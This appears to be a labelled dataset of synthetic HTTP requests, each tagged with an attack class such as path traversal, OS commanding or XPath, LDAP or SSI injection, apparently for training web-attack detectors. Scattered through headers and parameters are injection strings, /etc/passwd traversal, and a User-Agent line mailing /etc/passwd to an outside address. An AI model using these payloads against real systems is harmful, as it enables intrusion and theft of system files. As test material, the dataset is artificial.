GET /uD6hGKzH0ng/eNmsiTmC/ioRudatNgceaxdieeeoa/rH/nrharisdinoaecadt/ninru0sulqueora/hoGVxU-qr8LG.auTCxB-/ec/dVUeohG/omwuhJpirinseudeav/aMgZPNc0VlBmlnTP.png?Jprocessing-instructionhninput=tpe&ydocumentausrOyOicopyPa@=ol&t7e2oe=hnodeu&stmlb=arFe&xtt4ashehB=trPAj&anchl=oagma&iomfategloddL=dhrnyx0hmhr&rst8ob=+t&Ouuhcntelsnz=50687 HTTP/1.0
Host: 97.190.53.198
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-874, us-ascii, iso-2022-jp
Accept-Encoding: 
Accept-Language: lerre-ddoin, iEa-iikuM;q=0.3, v-enhrE;q=0.1
Cache-Control: max-stale
Client-ip: 42.161.91.179
Cookie: dlae8etielEaq=t@y.Ti;oct=gLhLet'    or count(  path/child::node()[position(   )=((    i + j   +    k   +    l  +    1)]     |    path/child::*()[position()=(k+1)])=1  or   'oqs4es'   = '    arhtsazA'    or;6do=715557;ol22d=83
Cookie2: $Version="4"
Date: Fri, 07 Dec 07 06:04:47 UTC
ETag: ".Lj17Nox0S6eIS0"
Expect: raem=eiilct
From: A2neohm@la7j9Ginh.com
If-Modified-Since: Wed, 27 Oct 04 09:28:41 UTC
If-Unmodified-Since: Thu, 22 May 08 20:24:00 UTC
If-Match: "kq-BIi4.MWecyY-WX4V"
If-None-Match: "f2SbjEVVriOcwZE0"
If-Range: Fri, 08 May 09 13:24:28 CET
Max-Forwards: 0
MIME-Version: 4.2
Pragma: Et='w'
Proxy-Authorization: Digest response="CdEdc9ADFAE4eb4Adb9195AfC0DfF9e6"
Authorization: rssoI rffar0i=5tBGnd
Range: 10-,-037175,0931-3
Referer: /laltalo/hbjj/ytatxx/Nsaki.ace
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/9.1 (compatible; lodriHvsab; Solaris; osneHuh8; qh9nsear; i1meen)
UA-CPU: PowerPC
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0994x095
Via: 8.4 www.gx3eh.html, FTP/0.8 www.Utaaa.js, HTTP/4.8 www.ohu9aw.jpeg
Transfer-Encoding: deflate
Upgrade: nea/7.4, eNt/9.7, lsi/6.2, 2El/8.5, hravyc/9.6
Warning: 304 129.52.86.175 "bsnutzhax5htl" 
X-Forwarded-For: 83.226.88.8
X-Serial-Number: 86756657363
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48411
Start - Id: 46309
class: PathTransversal
GET /ZbinMK/dhvMzXAqCN/spyb3/no-91rKn70Qt/YW3c-U/a0vx0/fLuZev.jpg?sFFdyG3FU0aoo=euu%5Cr&J14u4=20555183&sR3ontg=ORet5ttgsmxahot&rwn4rO1u3a=61392156&si=NehE1&usl9=6&1irn=890135392&uJkX@C4U=bsam%2F&1qAB=42&at=6xTsaI&vyIDHLj=%2F%2C%2C%2C%2Fr3riss%2Fciein%2Fpasswd&frps=+tazlnt5n&tuAaoyobybeuid=a+tgtoptIsO HTTP/1.0
Host: 36.172.234.106:4752
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.6
Accept-Language: b-aTo, hOiys0g-uu, 5ilqE-emAn1;q=0.7
Cache-Control: no-store
Client-ip: 208.222.203.198
Cookie: SalhcLiesvrTc=075506;seihaabo=128;auteeaAusXnx=ey1Uqe8vqK
Cookie2: $Version="3"
Date: Thu, 13 Apr 06 04:52:09 CET
ETag: W/"X6BJrt.UWHlAh@dky"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 12 Aug 04 19:35:31 GMT
If-Unmodified-Since: Mon, 03 Dec 07 01:57:14 UTC
If-Match: "zEvQburn.bU2AmFOXP5a"
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 605
MIME-Version: 2.5
Pragma: Etpr5=py
Proxy-Authorization: NTLM SWV0eWl5NXJoSXNUbG9pZXpveW5kclRvb2xiYXlmY2NhYXQ=
Authorization: NTLM bnV0cW1hbjRhbW55c3RJYW8wbkx4bmhTaWlwc2FFbWlNbXhtaHRkQWZ3aXc=
Range: 426-9089,-721
Referer: /awtA/8cga/nepptz/letfw.bin
TE: trailers,trailers
Trailer: Expect
User-Agent: pAiRVD_hN http://www.bShtdarh.fr
UA-CPU: Sparc
UA-Disp: 609,9430,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 2.5 66.111.4.180, tIo/8.1 114.146.227.57:61
Transfer-Encoding: identity
Upgrade: iNrqo/0.0, 3ii6c/7.6, pN6ieo/9.3, uda/6.3
Warning: 507 www.fij6i.htm "ebesreamwt" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46309
Start - Id: 43010
class: OsCommanding
PUT /oqu4avO8XdgJ/urt3/rzXoAs_hj/eing/EcutmsOtuo/8Yk.html? HTTP/1.1
Content-Length: 342
Content-Language: S3amea,ant1e3t0,iNyr
Content-Encoding: gzip
Content-Location: http://www.bikso.gov/mKFt/um1eteTE/oopyhn/ccipgnmy.tar
Content-MD5: dHJtZWhTaGhkcjg3YTd1ag==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jun 06 17:13:25 GMT
Last-Modified: Fri, 29 Apr 05 05:10:09 UTC
Host: 73.95.8.226
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: eeRai-Ckte7;q=0.0, ht-aiOtug;q=0.3
Cache-Control: no-transform
Client-ip: 236.0.182.54
Cookie: I2P.aT3=0135233;me=ltlRiv
Cookie2: $Version="63"
Date: Tue, 06 Mar 07 11:07:49 CET
ETag: "X6SSI8tAMpm@96bN5OZe"
Expect: 100-continue
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 13 Apr 05 06:46:23 CET
If-Unmodified-Since: Mon, 29 Aug 05 21:03:53 GMT
If-Match: "qGZo@jMcMeCGnSlW0Kx"
If-None-Match: "Wf4.Gz8ZK0uCQmV"
If-Range: "gI5FGGrGt_9N7wjZ"
Max-Forwards: 726
Pragma: no-cache
Authorization: Digest realm
Referer: /isdeMp/8isec/p0cla9t0/Trfi0Lt.tar
TE: chunked,trailers
Trailer: Pragma
User-Agent: Mozilla/4.8 (Windows; U; WinNT 0.1; ta-ao; rv:0.8.5) Gecko/14780013
UA-Pixels: 2695x320
Via: 1.6 148.148.60.141, FTP/0.2 www.tgTi.js
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: ynp/2.4
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~~

9seYevftblnt=olia3slM&ewiolisl8cei=l1PP6ys-nwO&ieseauenag=3pcatarcpehiexecxey4rs4t&odoe=rayhre&hrnEg=/perl     /tmp/isrestde.pl  -p3316&0L_z9u9RNm=aIy9&qxnwitiesW58bg=tseat&mycesppmet=63&3HOr6ywl9E4f=wrpi8h4b5torhehro3&daxsce1Nhbe=b6o4UK&yrot=94373676&esugNcillo=oosnuraeoru11q9da&aathnsl1ienid4e=1308&ms9rra=97867603&laneaheb6eear=trqZ

End - Id: 43010
Start - Id: 43381
class: OsCommanding
GET /oNsDXeJ0v4ORZk/7EY5LvF/aScelaLIJy2PVaO/tH1fs042cLDB5Xsy/arnnsm2PlAie/lw5vNefUR_ux/efyoit/crxkopit/bt/sMtwtn4h2fCtuoglfeS.css?unflld=ioryp&fH5TcopyOtgExJ=euqN%3Epea1&n0nton=40&ooununcgJlzaiMn=jR&ubwea=Aebodycfee&Thvkawvi21i3=581543967&rfjaThj2s0=16270483&staefwoiWpS5st=307&CKsamfBNeW9=yuibktisDaSea6&qonnn8ehin=s&.Sm2@=s%3C+Mz&hwpde6ul6jyob=8673448&QK9mFIwW=8951391&GIQ0=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fcat++%2Fetc%2Fpasswd+++++%7C&Dyfah5=6033143975 HTTP/1.0
Host: 238.36.15.78
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: 7eeml=cxdtaeil
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="54"
Date: Thu, 04 Oct 07 14:36:24 UTC
ETag: W/"r8KgoWtqM31BgobVy"
Expect: railv
From: no4b@rasantepan.ch
If-Modified-Since: Tue, 29 Sep 09 03:54:34 UTC
If-Unmodified-Since: Mon, 17 Aug 09 06:44:39 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Mar 04 08:32:25 GMT
Max-Forwards: 56
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: NTLM aUFhdDRtc2Z1dWVjdGhldW8zZWFlZWwzb3NTYmNkdWxlbkQ1YW90cm5xdEw5aG9h
Range: 233-,3-70638,78-7879
Referer: http://edisido.uk/pabedd/i6Hizu.msf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/9.3 (Machintosh; U; PPC Mac OS X 9.5; 4t-At; rv:2.6.0) Gecko/12413371
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 3.3 21.188.199.66, HTTP/1.4 47.106.91.135:0
Transfer-Encoding: deflate
Upgrade: e8r/2.5, Otwtv/4.8, hhlyn4/7.3
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 17.138.146.187
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43381
Start - Id: 42864
class: OsCommanding
GET /epraln1araiEUe.jpg?goyyE=a%5Cnwinnt&ahfesa6af2=+n&Ir=hb%253&e4dielhahsur=239.104.217.96++++%7C+dir&n6G9nznutb9dtlz=sraofoom&otnvt6=osn&rosesO=dqe HTTP/1.1
Host: www.tWrsh.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15, utf-7;q=0.8, isiri-3342;q=0.5, gb2312;q=0.0
Accept-Encoding: gzip, compress, gzip, compress;q=0.9
Accept-Language: *;q=0.1
Cache-Control: max-age=01
Client-ip: 4.100.41.101
Cookie: 8EX0E3kT=wUdndgihiseimainss;ueliwdn=61;etEn=wioerrditaedaofsrf;l4orqh=iqmbyV3Rx
Cookie2: $Version="08"
Date: Sun, 28 Mar 10 17:03:49 GMT
ETag: W/"2uen9B8kkt8qjQvH"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 14 Feb 08 20:19:34 UTC
If-Unmodified-Since: Sat, 11 Jun 05 20:49:48 UTC
If-Match: *
If-None-Match: "dWptwQDyW2XvzD5oKKc7"
If-Range: Mon, 14 Nov 05 17:51:49 CET
Max-Forwards: 0
MIME-Version: 0.9
Pragma: oasrmknb='o45js'
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Basic Y3J0aGQ6bmR0amli
Range: -64,-955
Referer: http://pE9tl.biz/fhEyhtRD/rahm/o0docn/brez5s.jsp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 9.2; oa-nO; rv:7.7.5) Gecko/29444760
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: FTP/5.3 201.217.22.10
Transfer-Encoding: compress
Upgrade: lebr/9.5
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42864
Start - Id: 44818
class: PathTransversal
GET /2uhu3ecst/zttdssNoddn54o8oolSt/eieceeyng/rogoPCtC2sg@SgTTg41/AnqpA/vn9tiiIqsnterbetys/osrh0bwm7hwhSian/moOtSFnwAZoM2l/ye8VtfSv3vo_.asmx?jtrh=50735&olov0gh3Emnisrn=43019496&c3Ed=5164751&rzNeC=S%2B%3Dr&FaGmetalcfN=4&Dncrabe=29&tsrhwed=25430917&atVthrnmrloian=doc%28+file%3A%2F%2F%2Fc%3A%2Farm%2Fhemw6s.xml+++%29&o8fSOeN=TroalikedthoioN&I7aqsyhtihr1sxp=%280uLi%2Btrttboot.ini+netcatsi3d&dan9ibzpiurk2ln=9522577&l2ii9scce3od=7064 HTTP/1.0
Host: www.mhhar.ch
Connection: close
Accept: */*
Accept-Charset: iso-8859-15, windows-1255
Accept-Encoding: *;q=0.2
Accept-Language: xtest-o;q=0.9, e-jabhi;q=0.0, tqhdLi-dot;q=0.5
Cache-Control: no-cache
Client-ip: 92.163.213.217
Cookie: W2X-9gGQI=slRmwmdhq;id0csz=>eavz@8Nt;t5m3mhruur=e0iss
Cookie2: $Version="23"
Date: Fri, 12 Sep 08 07:19:09 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Thu, 19 Feb 04 11:28:48 UTC
If-Unmodified-Since: Sun, 24 Jan 10 21:56:24 CET
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: "EXjq0t12jkaHZPYSy"
Max-Forwards: 05
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: http://www.nEtQihb.uk/hgse/Tspcl/qsyNihhe/2ocawm2t/rmsae.cgi
TE: trailers,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: khtrQe5t7ui6i
UA-CPU: x86
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: 4.7 www.sxwrpvn.jpeg:3196, 8.3 www.ebhteech.gif
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 13064
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44818
Start - Id: 37660
class: LdapInjection
POST /us/Y55VNNXoZ3t.WeT/lOYbcfp/o4aufIy5viC3/EjV.html? HTTP/1.0
Content-Length: 247
Content-Language: een
Content-Encoding: compress
Content-Location: /ejofdixt/erexeg/HAesaom.conf
Content-MD5: c2dlaGhhdGVycjJuZURybQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Thu, 23 Apr 09 11:59:06 CET
Host: www.cityeicoap.st
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, euc-tw;q=0.6, windows-1253
Accept-Encoding: gzip, deflate, compress;q=0.8, identity
Accept-Language: *;q=0.7
Cache-Control: max-stale=8117
Client-ip: 88.224.210.21
Cookie: fD9dN=rne;fvu.mo8W=Emnwget;whAgwYJ=uo;OeEEjt=+g
Cookie2: $Version="657"
Date: Thu, 16 Mar 06 01:00:23 GMT
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: TttDoe@rczep.it
If-Modified-Since: Fri, 12 Sep 08 16:38:18 GMT
If-Unmodified-Since: Sun, 24 Jun 07 14:46:44 CET
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: "d.DGrsWliM4f-x9NR"
If-Range: *
Max-Forwards: 1810
MIME-Version: 8.2
Pragma: t4hCt=ocaer
Proxy-Authorization: Basic dUhlbTJpOnJzbXR2bHNx
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /8hc9tn/doep/recn/usw3t/7hdisuL.gif
TE: deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: f1AJOJSXc http://www.icc7hoe.com
UA-CPU: StrongARM
UA-Disp: 8272,2255,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 940x1719
Via: 7.5 221.2.37.208, FTP/4.2 www.n1hlsoEt.tiff, 4.8 www.vvBqaBg.png
Transfer-Encoding: Edla0w; ealhgc=lFheip3
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 0737126851
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7trncttedma=iE4%v&nieeutoaoCehgys=)    (   |    (lInrd=iesIn*)&tt=e&ua5riksaatl7e=fUrGdaz a &ilTsadatnytd=d-Teo&auni=1212&rapTt=8&ewrluayacnsu=link7=&eSostrge=6&eanlne5exm2eqo=An9rlotmpnacR=&ebtol0rbvw=8674&ateHa=ee&1wonvt=459307

End - Id: 37660
Start - Id: 49536
class: XPathInjection
GET /DGJevalc1x/t4Ga12aPq_n7Eau.Q_k/i0/RKcKCmaNxp_NSUprocessing-instructionNA/LcT4eFsyweothe/lbrcd2nisoit82at/qeUtPkIykY9d2/oAJg@b2x-Ig0-/Y0bUhkT4L-NbodybKD/37qxAYzOa84P1VWD/ou.tiff?t0ehU9eTiernioi=sQdOjy&aAsn3pcecxe=92211953&easlai=q-WZv4Jth&o1qe8Cyefreor=460206&kU3t=dfttofI&esne6=424&sen5TEDZlto=higIn1u&PXU3NXVJa=38449&aoshga=xduh4A&eeodts=ocsf&eNa=udi%2Feref%2Ftyu%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D178%5D+++%7C+++++vry%2Fthcl%2Fare%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D33%5D++or+%27z03gn%27+++%3D++++%27&s9rr=ieih&adminexeckM=8fwDoecSsystem+duihlftb-&ttmaNdertruc=45 HTTP/1.1
Host: 33.231.212.72
Connection: keep-alive
Accept: text/plain;q=0.5, application/*;q=0.3, image/gif;q=0.4
Accept-Charset: cp-932;q=0.5, iso-8859-2, x-mac-roman;q=0.1, iso-8859-2;q=0.2, iso-8859-4
Accept-Encoding: *
Accept-Language: mepbo-d, ruc-iowtqi, nl1Aeb-yslUN;q=0.2, e0tt-pp5Owg;q=0.0
Cache-Control: min-fresh=8
Client-ip: 91.134.19.242
Cookie: clei=ati;6pahh9zna=0rrs9uttrtepM5;exrTboxnmshyl=gsiroIiODt&imo;sneq30ysibUsaln=519
Cookie2: $Version="0"
Date: Wed, 07 Nov 07 09:39:03 UTC
ETag: W/"KtLgebekwR@UKJq0g"
Expect: edehn3bs=oglslt
From: ntesM@cHe7tnfpjs.org
If-Modified-Since: Wed, 19 Aug 09 02:10:03 GMT
If-Unmodified-Since: Sun, 09 Nov 08 15:13:22 GMT
If-Match: "rZAp-iTTM8z64R-D"
If-None-Match: "6L70SZ3iZksBSyZ"
If-Range: *
Max-Forwards: 2
MIME-Version: 4.9
Pragma: eMerdn='mn'
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: Digest opaque="rOd5sl"
Range: 121-,-5
Referer: http://cv9d.it/0brtemag.shtml
TE: chunked;q=0.8,trailers,deflate;q=0.1
Trailer: Connection
User-Agent: 2leEn/9.6.2.3
UA-CPU: x86
UA-Disp: 2924,8513,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 661x844
Via: FTP/8.1 www.4nqipht.js
Transfer-Encoding: identity
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49536
Start - Id: 49316
class: XPathInjection
GET /AVwBhttpsBFy68P/emxocaaEI9httamee.php?eolubhi7=axcicjPyo-Qg&QKhsjBT=Ee-0jts%3AtIns5rehim&8cHnvowinhte4t=9131&pt7ug=xhiev%27+or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i++%2B++++j%2B++++k%2B++l+++%2B1%29%5D++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+%27vswe%27++%3D++%27+++++bo%27+++or&86bktT4-2=adivnLDd&rhIw=oi%3F HTTP/1.0
Host: 109.203.41.58:80
Connection: a6ae
Accept: audio/basic
Accept-Charset: iso-10646-ucs-2, x-mac-arabic;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: 5xkrlhu=2duanE
Client-ip: 66.86.201.155
Cookie: 9xteIw=846177751;ieafesz8ye=u3uhome7%iHtodocumentL[oj3ms;acezehu=ciAgw@
Cookie2: $Version="4"
Date: Sun, 15 Nov 09 21:26:00 GMT
ETag: "QJH5BDGLKbNm42tiWHF"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Sun, 02 Sep 07 14:03:04 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 4
MIME-Version: 7.2
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: 6rts7i fsehur=hewya
Range: 28823-,87212-
Referer: http://0oot.gov/nraB/iiqdLoin.tiff
TE: deflate;q=0.0,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.2 (X11; U; Solaris 5.2; 2o-cb; rv:8.8.4) Gecko/45936875
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: HTTP/7.8 www.acst1tt.html:18, lcru/5.8 www.graor9k.jpg
Transfer-Encoding: a0Am4i; Netb=lhtnof
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 970 91.193.19.21 "6desenmdo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49316
Start - Id: 42936
class: OsCommanding
GET /hf/n1Yc/marvkosrmmuOifrb/Old/z6@YB5JNfeDseWc/hT/BXnullO/x0poewpy/nsCkpVdwrkGQ6K/rttEiantynaMdjfe4/NuMzMadobjectA3/U@iAc.2nQexecg1.jsp?ieescele5hccol0=jAslehts&sRwgYfpmip=+i&TN=1&Ijusystem1M=27201&9plimr=e&gfrnsboio=1pLQWOAVJ&wot3=a&mtisrksel=7eeote4nes&tl=7139365&oSFCuLzSlinkK=5390&e2=58&IedclnnkoennE=4308 HTTP/1.1
Host: www.eaeTninerI.com
Connection: keep-alive
Accept: image/*, video/*;q=0.4, text/*;q=0.3
Accept-Charset: windows-1258;q=0.4, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=6774
Client-ip: 226.241.221.163
Cookie: 2w07=5940;nSnhl=fHGuvr
Cookie2: $Version="148"
Date: Sat, 07 Jul 07 05:47:07 CET
ETag: W/"TPazJN9VkdLe-HTD6v"
Expect: 100-continue
If-Modified-Since: Tue, 28 Oct 08 01:07:02 CET
If-Unmodified-Since: Thu, 02 Sep 04 14:05:15 GMT
If-Match: *
If-Range: Mon, 17 Oct 05 13:52:05 CET
Max-Forwards: 6
MIME-Version: 6.5
Pragma: no-cache
Authorization: Basic aW5uNzp0VWFzaXFzdA==
Range: 01418-88080,370072-
Referer: /nocdgi/6its/9nieoen/rgtoqs/isern.exe
TE: deflate
Trailer: Referer
User-Agent: oops ;     cat    /etc/passwd |  mail your@heheh.com
UA-CPU: PowerPC
UA-Disp: 633,7308,8
UA-Color: color32
UA-Pixels: 512x475
Via: 5.0 55.98.52.230, taob/3.4 www.o0o4e.js, 3.0 www.i1bmt.tiff
Transfer-Encoding: gzip
Upgrade: rts/3.1, eacx/4.9, rit/1.5, Wj7c/1.4
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 
----: ------------------------------------------------

null

End - Id: 42936
Start - Id: 43626
class: OsCommanding
POST /njCskevay/rYSI1Zt5@W/urrU0iiy3ig1GeLv/i5/l0qrdrobEipz/2Fq1G..6yVWqgtcOJ_/Siesu1taltehleEvLbs/lsbjmBzbG.pl? HTTP/1.1
Content-Length: 266
Content-Language: 2yofig
Content-Encoding: identity
Content-Location: http://www.TscLjesu.gov/herre6s2/aiNtqiea/etTo.tar
Content-MD5: dGpkcmVpeXRybHc2bWZ0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Dec 08 03:48:26 CET
Last-Modified: Sun, 10 Jul 05 01:12:25 CET
Host: www.chnnc.com
Connection: close
Accept: audio/*
Accept-Charset: x-mac-chinesetrad;q=0.4, cp-932, x-mac-hebrew, x-mac-ce;q=0.9, iso-2022-jp
Accept-Encoding: compress;q=0.7
Accept-Language: '     ;ps -aux    ;
Cache-Control: no-transform
Client-ip: 224.134.148.160
Cookie: iub2Iai2=spvttu;adtrtg=@o
Cookie2: $Version="2"
Date: Mon, 31 Mar 08 11:55:10 GMT
ETag: W/"_wjzjt03Jr-1UO646"
Expect: 100-continue
If-Modified-Since: Fri, 01 Oct 04 12:38:20 UTC
If-Unmodified-Since: Mon, 05 Feb 07 20:32:00 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Dec 04 10:44:38 CET
Max-Forwards: 6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="hfwlezH"
Range: 887295-
Referer: http://www.hEeeenl.uk/sedSmo/inoiuk/eote6.txt
TE: gzip,chunked;q=0.3
Trailer: Expect
User-Agent: ePEja4IQ http://www.rcpep.be
UA-CPU: Sparc
Via: 5.9 www.yoSs74Hz.jpeg
Transfer-Encoding: identity
Warning: 252 70.73.147.186 "pEmiltogwecsNt4" "Tue, 06 Jan 04 03:06:17 CET"
X-Forwarded-For: 229.53.116.226
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fct6Ts8rz5pma7e=0916&ito8elluOah=SWovi&pe=d=eeitbA&Te7relWidyphi=eWfSzTZyydGe&hiuonatwmthhil7=pmeaZ?n&d8nhil4pedTna0s=3174188&iBVY-7winnt=IaOrvhrodrvlrrs&8irnltadtbvie7=7925365&cSrlec=h1p access_logxq5rsg&Msjsem8aIeeecd=dcr&pevcaimIr9jtr0=3]+e?ebo+yi=i

End - Id: 43626
Start - Id: 40772
class: SSI
POST /tit/sgS_JAbwemb/r8F8rKjFPTepx1JO/dtetador85sisaiee/soBIb6xTMbVOFj-KZ.jpg? HTTP/1.0
Content-Length: 302
Content-Language: Lru,H,tviI
Content-Encoding: deflate
Content-Location: /Tn1s.wmn
Content-MD5: MjVpN2RybHA0cnMybHhlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Aug 08 11:56:46 UTC
Last-Modified: Thu, 26 Aug 04 16:34:41 GMT
Host: www.ltQyr.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ucr-Ea2aqtn;q=0.6, 3tnYn-dAdtnk, W-uomP;q=0.6
Cache-Control: no-transform
Client-ip: 166.41.33.129
Cookie: oIliearsGn=8ralyh;tamtnL=taohii;erh=es] ?
Cookie2: $Version="1"
Date: Tue, 28 Mar 06 14:22:12 UTC
ETag: "nl3cCS-91kvJ.@5g"
Expect: neiat
From: DbshI@eusrtwIFth.ch
If-Modified-Since: Sun, 23 Oct 05 14:18:50 CET
If-Unmodified-Since: Tue, 19 Jun 07 11:47:19 CET
If-Match: "aDYOLld0vd71u9yp6"
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: *
Max-Forwards: 52
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic ZW55bmVJbzpsdWxubXk=
Authorization: hpbs rtdmeDr=0oOs
Range: 07-9,0-,-333
Referer: http://www.teeiqc.uk/de9Rerfd/nmh1wti/seNeycN/anpns/cp8saLms.pdf
TE: trailers,chunked,deflate;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/5.2 (X11; U; Open BSD i586 9.3; 2g-ai; rv:2.7.5) Gecko/50873390
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 9aAnsp/2.7 www.etaatnw.jpg, HTTP/0.0 152.243.230.174, 5.2 www.pamslzs.jpg:0
Transfer-Encoding: identity
Upgrade: rhe/3.3
Warning: 513 www.et5ew.css "lNharrszlthnl3onoe0u" 
X-Forwarded-For: 31.100.82.188
X-Serial-Number: 476043
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

